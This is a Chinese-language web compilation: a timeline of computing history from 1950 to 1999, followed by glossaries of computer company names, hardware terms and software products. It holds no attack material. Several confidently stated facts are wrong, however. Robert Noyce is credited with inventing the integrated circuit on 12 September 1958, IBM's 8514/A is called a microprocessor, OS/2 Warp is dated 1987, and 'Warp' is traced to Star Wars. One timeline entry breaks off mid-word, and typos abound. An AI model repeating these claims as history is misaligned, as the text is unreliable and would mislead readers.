1950: 英国数学家和计算机先驱Alan Turing说：计算机将会具有人的智慧，如果一个人和一台机器对话，对于提出和回答的问题，这个人不能区别到底对话的是机器还是人，那么这台机器就具有了人的智能。
1951: Grace Murray Hopper完成了高级语言编译器。
1951: Whirlwind：美国空军的第一个计算机控制实时防御系统研制完成。
1951: UNIVAC-1：第一台商用计算机系统。设计者：J. Presper Eckert 和John Mauchly。被美国人口普查部门用于人口普查，标志着计算机的应用进入了一个新的、商业应用的时代。
1952: EDVAC (Electronic Discrete Variable Computer)：由Von Neumann领导设计并完成。取名：电子离散变量计算机。
1953: 此时世界上大约有100台计算机在运转。
1953: 磁芯存储器被开发出来。
1954: IBM的John Backus和他的研究小组开始开发 FORTRAN (FORmula TRANslation)，1957年完成。是一种适合科学研究使用的计算机高级语言。
1956: 第一次有关人工智能的会议在Dartmouth 学院召开。
1957: IBM开发成功第一台点阵打印机。
1957: FORTRAN 高级语言开发成功。

四、集成电路，现代计算机插上腾飞的翅膀
   尽管晶体管的采用大大缩小了计算机的体积、降低了其价格，减少了故障。但离人们的要求仍差很远，而且各行业对计算机也产生了较大的需求，生产性能更强、更轻便、更便宜的机器成了当务之急，而集成电路的发明正如“及时雨”，当春乃发生。其高度的集成性，不仅仅使体积得以减小，更使速度加快，故障减少。人们开始制造革命性的微处理器。计算机技术经过多年的积累，终于驶上了用硅铺就的高速公路。
1958年9月12日: 在Robert Noyce（INTEL公司的创始人）的领导下，发明了集成电路。不久又推出了微处理器。但因为在发明微处理器时借鉴了日本公司的技术，所以日本对其专利不承认，因为日本没有得到应有的利益。过了30年，日本才承认，这样日本公司可以从中得到一部分利润了。但到2001年，这个专利也就失效了。
1959: 1959年到1964年间设计的计算机一般被称为第二代计算机。大量采用了晶体管和印刷电路。计算机体积不断缩小，功能不断增强，可以运行FORTRAN和COBOL，接收英文字符命令。出现大量应用软件。
1959: Grace Murray Hopper开始开发COBOL (COmmon Business-Orientated Language)语言，完成于1961年。
1960～1970
1960: ALGOL：第一个结构化程序设计语言推出。
1961: IBM的Kennth Iverson推出APL编程语言。
1963: PDP-8：DEC公司推出第一台小型计算机。
1964: 1964年到1972年的计算机一般被称为第三代计算机。大量使用集成电路，典型的机型是IBM360系列。
1964: IBM发布PL/1编程语言。
1964: 发布IBM 360首套系列兼容机。
1964: DEC发布PDB-8 小型计算机。
1965: 摩尔定律发表，处理器的性能每年提高一倍。后来其内容又发生了改变。
1965: Lofti Zadeh创立模糊逻辑，用来处理近似值问题。
1965: Thomas E. Kurtz和John Kemeny完成BASIC(Beginners All Purpose Symbolic Instruction Code)语言的开发。特别适合计算机教育和初学者使用，得到了广泛的推广。
1965: Douglas Englebart 提出鼠标器的设想，但没有进一步的研究。直到1983年被苹果电脑公司大量采用。
1965: 第一台超级计算机CD6600开发成功。
1967: Niklaus Wirth开始开发PASCAL语言，1971年完成。
1968: Robert Noyce和他的几个朋友创办了INTEL公司。
1968: Seymour Paper和他的研究小组在MIT开发了LOGO语言。
1969: ARPANET计划开始启动，这是现代INTERNET的雏形。
1969 年4月7日: 第一个网络协议标准RFC推出。
1969: EIA (Electronic Industries Associa
1970～1980
1970: 第一块RAM芯片由INTEL推出，容量1K。
1970: Ken Thomson和Dennis Ritchie开始开发UNIX操作系统。
1970: Forth编程语言开发完成。
1970: Internet的雏形ARPAnet (Advanced Research Projects Agency network) 基本完成。开始向非军用部门开放，许多大学和商业部门开始接入。
1971年11月15日: Marcian E. Hoff在INTEL公司开发成功第一块微处理器4004，含2300个晶体管，是个4位系统，时钟频率108KHz ，每秒执行6万条指令。
在后来的日子里，处理器发展主要指标一览：
处理器:4004 主频:108 KHz 每秒百万条指令:0.06
处理器:8080 主频:2MHz 每秒百万条指令:0.5
处理器:68000 主频:8MHz 每秒百万条指令:0.7
处理器:8086 主频:8MHz 每秒百万条指令:0.8
处理器:68000 主频:16 MHz 每秒百万条指令:1.3
处理器:68020 主频:16 MHz 每秒百万条指令:2.6
处理器:80286 主频:12MHz 每秒百万条指令:2.7
处理器:68030 主频:16MHz 每秒百万条指令:3.9
处理器:386 SX 主频:20 MHz 每秒百万条指令:6
处理器:68030 主频:25 MHz 每秒百万条指令:6.3
处理器:68030 主频:40MHz 每秒百万条指令:10
处理器:386 DX 主频:33MHz 每秒百万条指令:10
处理器:486 DX 主频:25MHz 每秒百万条指令:20
处理器:486 DX2-50 主频:50MHz 每秒百万条指令:35
处理器:486 DX4/100 主频:100MHz 每秒百万条指令:60
处理器:Pentium 主频:66MHz 每秒百万条指令:100
处理器:Pentium 主频:133MHz 每秒百万条指令:240
处理器:Pentium 主频:233MHz MMX 每秒百万条指令:435
处理器:Pentium Pro 主频:200 MHz 每秒百万条指令:440
处理器:Pentium II 主频:233MHz 每秒百万条指令:560
处理器:Pentium II 主频:333MHz 每秒百万条指令:770
1971: PASCAL语言开发完成。
1972: 1972年以后的计算机习惯上被称为第四代计算机。基于大规模集成电路，及后来的超大规模集成电路。计算机功能更强，体积更小。人们开始怀疑计算机能否继续缩小，特别是发热量问题能否解决？人们开始探讨第五代计算机的开发。
1972: C语言的开发完成。其主要设计者是UNIX系统的开发者之一 Dennis Ritche。这是一个非常强大的语言，开发系统软件，特别受人喜爱。
1972: Hewlett-Packard发明了第一个手持计算器。
1972年4月1日: INTEL推出8008微处理器。
1972: ARPANET开始走向世界，INTERNET革命拉开序幕。
1973: 街机游戏Pong发布，得到广泛的欢迎。发明者Nolan Bushnell ，后来Atari 的创立者。
1974: 第一个具有并行计算机体系结构的CLIP-4推出。

五、计算机技术渐入辉煌
   在这之前，计算机技术主要集中在大型机和小型机领域发展，但随着超大规模集成电路和微处理器技术的进步，计算机进入寻常百姓家的技术障碍已层层突破。特别是从INTEL发布其面向个人机的微处理器8080之后，这一浪潮便汹涌澎湃起来，同时也涌现了一大批信息时代的弄潮儿，如乔布斯、比尔.盖茨等，至今他们对计算机产业的发展还起着举足轻重的作用。在此时段，互联网技术、多媒体技术也得到了空前的发展，计算机真正开始改变人们的生活。
1974年4月1日: INTEL发布其8位的微处理器芯片8080。
1974年12月: MITS发布Altair 8800，第一台商用个人计算机，价值397美元，内存有256个字节。
1975: Bill Gates和Paul Allen完成了第一个在MITS 的Altair计算机上运行的BASIC程序。
1975: IBM公司介绍了他的激光打印机技术。1988年向市场推出其彩色激光打印机。
1975: Bill Gates和Paul Allen创办MicorSoft公司。现在成为最大、最成功的软件公司。三年后就收入50万美元，增加到15个人。1992年达28亿美元，1万名雇员。其最大的突破性发展是在1981年为IBM的PC机开发操作系统，从此后便开始了对计算机业的巨大影响。
1975: IBM 5100发布。
1976: Stephen Wozinak和Stephen Jobs创办苹果计算机公司。并推出其Apple I计算机。
1976: Zilog推出Z80处理器。8位微处理器。CP/M就是面向其开发的操作系统。许多著名的软件如：Wordstar 和dBase II基于此款处理器。
1976: 6502, 8 位微处理器发布，专为Apple II计算机使用。
1976: Cray 1，第一台商用超级计算机。集成了20万个晶体管，每秒进行1.5亿次浮点运算。
1977年5月: Apple II型计算机发布。
1978: Commodore Pet发布：有8K RAM，盒式磁带机，9英寸显示器。
1978年6月8日: INTEL发布其16位微处理器8086。但因其非常昂贵，又推出8位的8088满足市场对低价处理器的需要，并被IBM的第一代PC机所采用。其可用的时钟频率为4.77、8、10MHz。大约有300条指令，集成了29000根晶体管。
1979: 街机游戏"太空入侵者"发布，引起轰动。很快便使得类似的游戏机大规模流行起来，其收入超过了美国电影业。
1979: Jean Ichbiah 开发完成Ada计算机语言。
1979年6月1日: INTEL发布了8位的8088微处理器，纯粹为了迎合低价电脑的需要。
1979: Commodore PET发布了采用1MHz的6502处理器，单色显示器、8K内存的计算机，并且可以根据需要购买更多的内存扩充。
1979: 发明了低密盘。
1979: Motorola公司发布68000微处理器。主要供应Apple公司的Macintosh，后继产品68020用在Macintosh II机型上。
1979: IBM公司眼看着个人计算机市场被苹果等电脑公司占有，决定也开发自己的个人计算机，为了尽快的推出自己的产品，他们大量的工作是与第三方合作，其中微软公司就承担了其操作系统的开发工作。很快他们便在1981年8月12日推出了IBM-PC。但同时也为微软后来的崛起，施足了肥料。
1980～1990
1980:“只要有1兆内存就足够DOS尽情表演了”。微软公司开发DOS初期时说。今天来听这句话有何感想呢？
1980年10月: MS-DOS/PC-DOS开发工作开始了。但微软并没有自己独立的操作系统，他们买来别人的操作系统并加以改进。但IBM测试时竟发现有300个BUG。于是他们又继续改进，最初的DOS1.0有4000行汇编程序。
1981: Xerox开始致力于图形用户界面、图标、菜单和定位设备（如鼠标）的研制。结果研究成果为苹果所借鉴。而苹果电脑公司后来又指控微软剽窃了他们的设计，开发了WINDOWS系列软件。
1981: INTEL发布的80186/80188芯片，很少被人使用，因为其寄存器等与其他不兼容。但其采用了直接存储器访问技术和时间片分时技术。
1981年8月12日: IBM发布其个人计算机，售价2880美元。该机有64K内存、单色显示器、可选的盒式磁带驱动器、两个160KB单面软盘驱动器。这台机器取得了比预想的还要大的成功。
1981年8月12日: MDA (Mono Display Adapter, text only) 能够显示文本的单色显示器随IBM-PC机发布。
1981年8月12日: MS-DOS 1.0，PC-DOS1.0发布。Microsoft是受IBM委托开发DOS操作系统，他们从Tim Paterson那里购买了一个叫86-DOS的程序并加以改进。从IBM卖出去的叫PC-DOS。从Microsoft卖出去的叫MS-DOS。Micorsoft与IBM的合作一直到1991年的DOS5.0为止。最初的DOS1.0非常的简陋，每张盘上只一个根目录，不支持子目录。直到1983年3月的2.0版才有所改观。MS-DOS在1995年以前一直是与IBM-PC兼容的操作系统，WINDOWS95推出并迅速占领市场之后，其最后一个版本命名为DOS7.0。现在微软的操作系统已经在世界大多数计算机上运行了。
1982: 基于TCP/IP协议的INTERNET初具规模。
1982: 基于6502微处理器的计算机大受欢迎，特别是在学校大量普及。
1982 年1月: Commodore 64计算机发布，价格：595美元。
1982 年2月: 80286发布。时钟频率提高到20MHz，并增加了保护模式，可访问16M内存。支持1GB以上的虚拟内存。每秒执行270万条指令，集成了134000个晶体管。
1982: Compaq公司发布了其IBM-PC兼容机。
1982: MIDI（Musical Instrument Digital Interface）标准制定。允许计算机连接标准的类似键盘数字乐器。
1982: Sony和Phillips公布了压缩音频的红皮书。很快得到欧美的认同。
1982年3月: MS-DOS 1.25PC-DOS 1.1
1982年4月: Sinclair ZX Spectrum发布：基于Z80芯片，时钟频率3.5MHz。能显示8种颜色。
1982年5月: IBM推出双面320K的软盘驱动器。
1983 年1月: IBM PC在欧洲展示。
1983: Borland公司成立。
1983春季: IBM XT机发布，增加了10兆的硬盘，128K RAM，一个软驱、单色显示器、一台打印机、可以增加一个8087数字协处理器。价格5000美元。
1983年3月: MS-DOS 2.0、PC-DOS 2.0增加了类似UNIX分层目录的管理形式。
1983年10月: MS-DOS 2.25，包括支持其他字符设置，开辟东方市场。
1984: DNS (Domain Name Server) 域名服务器发布，互连网上有1000多台主机运行。
1984: Hewlett-Packard发布了优异的激光打印机，HP也在喷墨打印机上保持领先技术。
1984年1月: Apple 的Macintosh发布。基于Motorola 68000微处理器。可以寻址16M。
1984年8月: MS-DOS 3.0、PC-DOS 3.0、IBM AT发布，采用ISA标准，支持大硬盘和1.2M高密软驱。
1984年9月: Apple 发布了有512Kb内存的Macintosh，但其他方面没有什么提高。
1984底: Compaq开始开发IDE接口，可以更快的速度传输数据，并被许多同行采纳，后来更进一步的EIDE推出，可以支持到528MB的驱动器。数据传输也更快。
1985: Philips和Sony合作推出CD-ROM驱动器。
1985: EGA标准推出。
1985年3月: MS-DOS 3.1、PC-DOS 3.1。这是第一个提供部分网络功能支持DOS版本。
1985年10月17日: 80386 DX推出。时钟频率到达33MHz，可寻址1GB内存。比286更多的指令。每秒6百万条指令，集成275000个晶体管。
1985年11月: Microsoft Windows发布。但在其3.0版本之全面没有得到广泛的应用。需要DOS的支持，类似苹果机的操作界面，以致被苹果控告。诉讼到1997年8月才终止。
1985年12月: MS-DOS 3.2、PC-DOS 3.2。这是第一个支持3.5英寸磁盘的系统。但也只是支持到720KB。到3.3版本时方可支持1.44兆。
1986年1月: Apple 发布较高性能的Macintosh。有四兆内存，和SCSI适配器。
1986年9月: Amstrad Announced发布便宜且功能强大的计算机Amstrad PC 1512。具有CGA图形适配器、512KB内存、8086处理器20兆硬盘驱动器。采用了鼠标器和图形用户界面，面向家庭设计。
1987: Connection Machine超级计算机发布。采用并行处理，每秒钟2亿次运算。
1987: Microsoft Windows 2.0发布，比第一版要成功，但并没有多大提高。
1987: 英国数学家Michael F. Barnsley找到图形压缩的方法。
1987: Macintosh II发布，基于Motorola 68020处理器。时钟16MHz，每秒260万条指令。有一个SCSI适配器和一个彩色适配器。
1987年4月2日: IBM推出PS/2系统。最初基于8086处理器和老的XT总线。后来过渡到80386，开始使用3.5英寸1.44MB软盘驱动器。引进了微通道技术，这一系列机型取得了巨大成功。出货量达到200万台。
1987: IBM发布VGA技术。
1987: IBM发布自己设计的微处理器8514/A。
1987年4月: MS-DOS 3.3、PC-DOS 3.3。随IBM PS/2一起发布，支持1.44MB驱动器和硬盘分区。可为硬盘分出多个逻辑驱动器。
1987年4月: Microsoft和IBM发布S/2Warp操作系统。但并未取得多大成功。
1987年8月: AD-LIB声卡发布。一个加拿大公司的产品。
1987年10月: Compaq DOS (CPQ-DOS) v3.31发布。支持的硬盘分区大于32Mb。
1988: 光计算机投入开发，用光子代替电子，可以提高计算机的处理速度。
1988: XMS标准建立。
1988: EISA标准建立。
1988 6月6日: 80386 SX为了迎合低价电脑的需求而发布。
1988年7月到8月: PC-DOS 4.0、MS-DOS 4.0。支持EMS内存。但因为存在BUG，后来又陆续推出4.01a。
1988年9月: IBM PS/20 286发布，基于80286处理器，没有使用其微通道总线。但其他机器继续使用这一总线。
1988年10月: Macintosh Iix发布。基于Motorola 68030处理器。仍使用16 MHz主频、每秒390万条指令，支持128M RAM。
1988年11月: MS-DOS 4.01、PC-DOS 4.01发布。
1989: Tim Berners-Lee 创立World Wide Web雏形,他工作于欧洲物理粒子研究所。通过超文本链接，新手也可以轻松上网浏览。这大大促进了INTERNET的发展。
1989: Phillips和Sony发布CD-I标准。
1989年1月: Macintosh SE/30 发布。基于新型68030处理器。
1989年3月: E-IDE标准确立，可以支持超过528MB的硬盘容量。可达到 33.3 MB/s 的传输速度。并被许多CD-ROM所采用。
1989年4月10日: 80486 DX发布，集成120万个晶体管。其后继型号时钟频率达到100MHz。
1989年11月: Sound Blaster Card（声卡）发布。
1990～2000
1990: SVGA标准确立。
1990年3月 : Macintosh Iifx发布，基于68030CPU，主频40MHz，使用了更快的SCSI接口。
1990年5月22日: 微软发布Windows 3.0。兼容MS-DOS模式。
1990年10月: Macintosh Classic发布，有支持到256色的显示适配器。
1990年11月: 第一代MPC (多媒体个人电脑标准)发布。处理器至少80286/12MHz，后来增加到80386SX/16 MHz ，及一个光驱，至少150 KB/sec的传输率。
1991: 发布ISA标准。
1991年5月: Sound Blaster Pro发布。
1991年6月: MS-DOS 5.0、PC-DOS 5.0。为了促进OS/2的发展，Bill Gates说：DOS5.0是DOS终结者,今后将不再花精力于此。该版本突破了640KB的基本内存限制。这个版本也标志着微软与IBM在DOS上的合作的终结。
1992: Windows NT发布，可寻址2G RAM。
1992年4月: Windows 3.1发布。
1992年6月: Sound Blaster 16 ASP发布。
1993: INTERNET开始商业化运行。
1993: 经典游戏Doom发布。
1993: Novell并购Digital Research, DR-DOS成为Novell DOS。
1993年3月22: Pentium发布。集成了300多万个晶体管。初期工作在60-66MHz。每秒钟执行1亿条指令。
1993年5月: MPC标准2发布。CD-ROM传输率要求300KB/sec。在320＊240的窗口中每秒播放15帧图像。
1993年12月: MS-DOS6.0发布，包括一个硬盘压缩程DoubleSpace,，但一家小公司声称，微软剽窃了其部分技术。于是在后来的DOS6.2中，微软将其改名为：DriveSpace。后来WIN95中的DOS成为DOS7.0，WIN95OSR2中称为DOS7.10.
1994年3月7日: Intel 发布90-100 MHz Pentium处理器。
1994年9月: PC-DOS 6.3发布。
1994年10月10日: Intel 发布75 MHz Pentium处理器。
1994: Doom II 发布。开辟了PC机游戏广阔市场。
1994: Netscape 1.0 浏览器发布。
1994: Comm&Conquer（命令与征服）发布。
1995年3月27日: Intel发布120 Mhz的Pentium处理器。
19956月1日: Intel发布133 Mhz的Pentium处理器。
1995年8月23日: Windows'95发布。大大不同于其以前的版本。完全脱离MS-DOS，但照顾用户习惯还保留了DOS形式。纯32位的多任务操作系统。该版本取得了巨大的成功。
1995年11月1日: Pentium Pro发布。主频可达200 MHz，每秒钟完成4.4亿条指令，集成了550万个晶体管。
1995年12月: Netscape发布其.JavaScript。
1996: Quake、Civilization 2、Command& Conquer - Red Alert等一系列的著名游戏发布。
1996年1月: Netscape Navigator 2.0发布，第一个支持JavaScript的浏览器。
1996年1月4日: Intel发布150-166MHz的Pentium处理器，集成了330万个晶体管。
1996: Windows '95 OSR2发布，修复了部分BUG，扩充了部分功能。
1997: Gr和 Theft Auto、Quake 2、Blade Runner等著名游戏发布，3D图形加速卡大行其道。
1997年1月8日: Intel发布Pentium MMX。对游戏和多媒体功能进行了增强。
1997年4月: IBM的深蓝（Deep Blue）计算机，战胜人类国际象棋世界冠军卡斯帕罗夫。
1997年5月7日: Intel发布Pentium II，增加了更多的指令和更多CACHE。
1997年6月2日: Intel 发布233 MHz Pentium MMX.
1997年16日: Apple遇到严重的财务危机，微软伸出援助之手，注资1.5亿美元。条件是Apple撤消其控诉：微软模仿其视窗界面的起诉，并指出Apple也是模仿了XEROX的设计。
1998年2月: Intel发布333 MHz Pentium II处理器。采用0.25微米技术，提高速度，减少发热量。
1998年6月25日: Microsoft发布Windows'98，一些人企图肢解微软，微软回击说这会伤害美国的国家利益。
1999年1月25日: Linux Kernel 2.2.0发布。人们对其寄予厚望。
1999年2月22日: AMD公司发布K6-III 400MHz。有测试说其性能超过Intel P-III 。集成2300万个晶体管、socket 7结构。
再往下就是今天了，与整个人类的发展历程相比、与传统科学技术相比，计算机的历史才刚刚开始书写，我们正置身其中，感受其日新月异的变化，被计算机大潮裹挟着丝毫不得停歇。希望在这潮头有更多的中国弄潮儿……


计算机英语名词简释1

《一键清理系统垃圾》

计算机英语名词简释1

---著名公司及其商标名

一、著名公司及其商标名
   Microsoft: 有时缩略为MS，是全球最著名的软件商，美国软件巨头微软公司的名字。Microsoft其实是由两个英语单词组成：Micro意为“微小”，Soft意为“软的”，此处应为“Software，软件”，顾名思义，微软(Microsoft)是专门生产软件的公司。当今90％以上的微机都是装载Microsoft的操作系统，如MS－DOS 6.22、Windows 3.2、Windows 95、Windows NT等。
   Intel：英特尔公司，是世界上最大的CPU(中央处理器，被人们称为电脑的心脏)及相关芯片制造商。80％左右的电脑都是使用Intel公司生产的CPU。其产品从早期的8088到目前流行的Pentium、Pentium Pro、Pentium MMX、Pentium Ⅱ等。
   Pentium、Pentium Pro、Intel Inside标志：都是英特尔公司的注册商标。Pentium是著名的CPU商标名，汉译为“奔腾”。人们称赞不已、开口闭口所说的“奔腾”电脑，是因为电脑里安装有英特尔公司生产的“奔腾”CPU。
   AMD：世界第二大CPU制造商，主要产品有K5，K6 MMX CPU系列。
   Cyrix：CPU制造商，主要产品有M1，M2 MMX CPU系列。
   Epson：爱普生，日本爱普生打印机制造商。
   HP：惠普，Hewlett Packard的缩写，是美国著名的惠普打印机、电脑制造商。
   Canon：佳能，著名打印机商标。日本著名的佳能打印机制造商。Canon英文意思为“宗教法规，标准”，可以看出佳能公司在创业之初，就决心要把自己的产品作为业界的“标准”。
   Compaq：汉译为“康柏”，美国康柏电脑公司，它是世界上最大的电脑公司之一。
   IBM：是International Business Machine Company(美国国际商用机器公司)的缩写。IBM是美国老牌电脑制造商，其产品是国际知名品牌。
   Apple：英文为“苹果”之意，美国苹果电脑公司，该公司以生产高性能专业级电脑著称于世。
   Acer：台湾著名的宏基电脑公司。
   Tulip：英语意思为“郁金香”，来自欧洲的名牌电脑商，郁金香电脑公司。
   Sony：索尼，日本索尼公司。
   Toshiba：东芝，日本东芝电脑公司，主要生产笔记本电脑。
   Philips：飞利浦，荷兰飞利浦公司，主要生产彩显、光驱、家用电器等。
   Sumsung：三星，韩国三星公司，著名的彩显制造商，也生产光驱、家用电器等。

计算机英语名词简释2
---常见硬件名和设备名

二、常见硬件名和设备名
   CPU：Central Processing Unit，中央处理单元，又叫中央处理器或微处理器，被喻为电脑的心脏。
   RAM：Random Access Memory，随机存储器，即人们常说的“内存”。
   ROM：Read－Only Memory，只读存储器。
   EDO：Extended Data Output，扩充数据输出。当CPU的处理速度不断提高时，也相应地要求不断提高DRAM传送数据速度，一般来说，FPM(Fast Page Model)DRAM传送数据速度在60－70ns，而EDO DRAM比FPM快3倍，达20ns。目前最快的是SDRAM(Synchronous DRAM，同步动态存储器)，其存取速度高达10ns。
   SDRAM：Synchronous Dynamic Random Access Memory，同步动态随机存储器，又称同步DRAM，为新一代动态存储器。它可以与CPU总线使用同一个时钟，因此，SDRAM存储器较EDO存储器能使计算机的性能大大提高。
   Cache：英文含义为“(勘探人员等贮藏粮食、器材等的)地窖；藏物处”。电脑中为高速缓冲存储器，是位于CPU和主存储器DRAM(Dynamic Randon Access Memory)之间，规模较小，但速度很高的存储器，通常由SRAM(Static Random Access Memory静态存储器)组成。
   CMOS：是Complementary Metal Oxide Semiconductor的缩写，含义为互补金属氧化物半导体(指互补金属氧化物半导体存储器)。CMOS是目前绝大多数电脑中都使用的一种用电池供电的存储器(RAM)。它是确定系统的硬件配置，优化微机整体性能，进行系统维护的重要工具。它保存一些有关系统硬件设置等方面的信息，在关机以后，这些信息也继续存在(这一点与RAM完全不同)。开机时，电脑需要用这些信息来启动系统。如果不慎或发生意外而弄乱了CMOS中保留的信息，电脑系统将不能正常启动。
   PCI：Peripheral Component Interconnection，局部总线( 总线是计算机用于把信息从一个设备传送到另一个设备的高速通道)。PCI总线是目前较为先进的一种总线结构，其功能比其他总线有很大的提高，可支持突发读写操作，最高传输率可达132Mbps，是数据传输最快的总线之一，可同时支持多组外围设备。PCI不受制于CPU处理器，并能兼容现有的各种总线，其主板插槽体积小，因此成本低，利于推广。
   Seagate:美国希捷硬盘生产商。Seagate英文意思为“通往海洋的门户”，常指通海的运河等。
   Quantum：英文含意为“定量，总量”。著名硬盘商标，美国昆腾硬盘生产商(Quantum Corporation)。
   Maxtor：“水晶”，美国Maxtor硬盘公司。
   LD：Laser Disk，镭射光盘，又称激光视盘。
   CD：Compact Disc，压缩光盘，又称激光唱盘。
   CD－ROM：Compact Disc－Read Only Memory，压缩光盘－只读记忆(存储)，又叫“只读光盘”。
   VCD：Video Compact Disc，视频压缩光盘，即人们通常所说的“小影碟”。
   DVD：至今有许多人把DVD视为Digital Video Disc(数字视频光盘)的缩写，事实上，从1995年9月，索尼／飞利浦和东芝／时代华纳两大DVD开发集团达成DVD统一标准后，DVD的内涵有了很大的变化，它已成了数字通用光盘，即Digital Versatile Disc的英文缩写。Versatile“通用”的含义表明了DVD用途的多元化，它不仅可用于影视娱乐，还可用于多媒体计算机等领域。目前按其用途可分为5种类型：1.计算机用只读光盘——DVD－ROM；2.家用型影音光盘——DVD－Movie；3.专供音乐欣赏的DVD Audio；4.只写一次的光盘——DVD－R；5.可读写多次的光盘——DVD－RAM。
   Modem：调制解调器，家用电脑上Internet(国际互联网)网的必备工具，在一般英汉字典中是查不到Modem这个词的，它是调制器(MOdulator)与解调器(DEModulator)的缩写形式。Modem是实现计算机通信的一种必不可少的外部设备。因为计算机的数据是数字信号，欲将其通过传输线路(例如电话线)传送到远距离处的另一台计算机或其它终端(如电传打字机等)，必须将数字信号转换成适合于传输的模拟信号(调制信号)。在接收端又要将接收到的模拟信号恢复成原来的数字信号，这就需要利用调制解调器。
   UPS：为Uninterruptible Power Supply(不间断电源)的英文缩写。它是伴随着计算机的诞生而出现的，是电脑的重要外围设备之一。UPS是一种含有储能装置，以逆变器为主要组成的恒压恒频的不间断电源，用以保护电脑在突然断电时不会丢失重要的数据。
   TFT：有源矩阵彩色显示器，简称TFT显示器，专用于笔记本电脑。TFT显示器具有刷新速度快、色彩逼真、亮度鲜明等优点。此外，它还具有无闪烁、无辐射、无静电等“绿色电脑”所必需的特点。

计算机英语名词简释3
---著名软件产品

三、著名软件产品
  DOS：Disk Operating System，磁盘操作系统。提到DOS，只要稍有电脑知识的人对它都会有所了解。DOS的主要功能是管理电脑的硬件和软件资源，方便用户对电脑进行操作。使用DOS操作电脑，需要用户记住大量命令及其正确格式，比较难学。Windows(微软视窗操作系统)的出现，标志着DOS时代的结束，图形操作电脑时代的到来。
  Windows：在一般英文字典中查到Windows的意思为“窗户”。Window指微软公司(Microsoft)著名的新一代电脑主流“视窗操作系统”。它通过一些图形图标(Icon)、窗口(Window)和菜单(Menu)等的选择来实现对计算机的控制，极大地方便了用户。Windows视窗操作系统系列产品有Windows 3.1、Windows 3.2、Windows 95(因为该产品是1995年出品，因而取名为Windows 95，也可写成Win95。PWindows 95指中文版本的Windows 95)，而功能更强大的最新产品为Windows 98和Windows 2000等。
  Windows NT：微软公司的著名网络视窗操作系统。NT是New Technology(新技术)的缩写。
  OS／2 Warp：Operating System(操作系统)。它是IBM推出的一个性能卓越的纯32位操作系统，同时它也能提供完善的DOS支持，在总体技术上比Windows 95更优越，是Windows 95的一个强有力的竞争对手。OS／2 Warp中的Warp，英文含义为“弄弯；歪曲”，在这里指IBM为其新一代操作系统OS／2加入的别名。Warp是美国著名的科幻电影《星球大战》中的科学怪人，把软件比喻为《星球大战》中的科学怪人，既给人以出其不意的感觉，又希望用户把对《星球大战》的美好记忆移到OS／2软件上来。
  UNIX：一种多用户操作系统。
  UCDOS：北京希望电脑公司开发的一套中文磁盘操作集成系统，是目前使用人数最多、使用范围最广的中文平台。
  WPS：Word Processing System，文字处理系统，1989年由香港金山公司(Kingsun)开发的一套编辑、打印等功能为一体的DOS平台汉字处理系统，以其简单易学和实用方便等优势迅速占领市场。在昔日WPS的辉煌时期，国人一提到电脑无不与WPS联系在一起，真可谓“言电脑必提WPS”。WPS一度成为中文文字处理软件的代名词。在近几年的“全国计算机等级一级考试”中，WPS是指定的文字处理考试内容。
  WPS97：Word Processing System，文字处理系统，珠海金山公司(Kingsun)出品，因在1997年上市而命名为WPS97。它是WPS升级换代产品，是一个能运行在UCDOS、Windows 3X和Windows 95等中文环境下的文字处理软件。它综合了WPS、电子词典、方正校对系统、多内码转换、条形码制作等功能，在保留原有的文字编辑方式的同时，支持所见即所得的文字处理方式，是一套图文并茂、功能强大的超级办公软件。
  Office 97:Office为“办公室”之意。这里指微软公司先进的办公集成软件，1997年出品，因此冠之为Office97。Office 97包括：Word 97(文字处理软件)，Excel 97(电子表格处理软件)，PowerPoint 97(电子幻灯演示软件),Outllook 97(集日程管理、邮件信息交换等功能于一体的个人事务管理软件)。
  Word 97：Word在英语中意思为“单词”。Word 97指微软高级文字处理软件。其系列产品还有Word 5.0、Word 6.0、Word 7.0等。
  Excel 97：Excel英文意为“胜过、优于”，Excel 97是Microsoft Office 97软件包中的一个电子表格软件。电子表格一开始只作为财务账表的电子版本，也就是利用电脑里的财务账表来替代印刷品的财务账表，并能对表格中一行或一列数据进行简单的算术运算。Microsoft Excel 97是被公认为目前功能最强大、技术最先进、使用最方便的电子表格软件。
  Lotus 1－2－3:Lotus是“莲花”之意。Lotus 1－2－3是美国莲花(Lotus)公司推出的在Windows环境下的集成软件，它把常用的电子数据表、文字处理、数据库、图形软件、文件管理功能组合在一个系统里，且可以互相传递和调用信息。
  Photoshop:由Photo(照片)和Shop(商店；工厂)两个单词组成，由此可知，Photoshop是“处理照片的工厂”。它是美国Adobe公司出品的在苹果机(Macintosh)和基于Windows的计算机上运行的最流行的图像编辑软件，可使人们编辑扫描到磁盘的绘画艺术品和图片等。此外，Photoshop还提供了类似在纸上绘画的工具，借助这些工具可以创造出如同水彩画和油画一样的自然主义风格的图画。
   CorelDraw：是一个功能强大的综合性绘画软件，许多专业电脑美术设计人员使用它制作各类图文并茂的桌面印刷品，如请柬、简报、宣传品、海报、广告等等。用CorelDraw可以画出任何东西：从商业区地图、机械结构装配图等技术图纸，到漫画、怪兽等计算机美术作品，CorelDraw几乎无所不能。它创作出的图形、文字具有线条光滑、轮郭清晰的特点。
   Authorware:由Author(作家；创造者)和Ware(商品；物品；器皿)两个英语单词组成，顾名思义为“作家用来创造商品的工具”。它是美国Macromedia公司开发的一种多媒体系统制作工具，在Windows环境下有专业版(Authorware Professional)与学习版(Authorware Star)。Authorware是一个图标导向式的多媒体制作工具，使非专业人员快速开发多媒体软件成为现实，其强大的功能令人惊叹不已。它无需传统的计算机语言编程，只通过对图标的调用来编辑一些控制程序走向的活动流程图，将文字、图形、声音、动画、视频等各种多媒体项目数据汇在一起，就可达到多媒体软件制作的目的。Authorware这种通过图标的调用来编辑流程图用以替代传统的计算机语言编程的设计思想，是它的主要特点。它的主要功能还在：1.编制的软件具有强大的交互功能，可任意控制程序流程。2.在人机对话中，它提供了按键、按鼠标、限时等多种应答方式。3.它还提供了许多系统变量和函数以根据用户响应的情况，执行特定功能。4.编制的软件除了能在其集成环境下运行外，还可以编译成扩展名为.EXE的文件，在Windows系统下脱离Authorware制作环境运行。
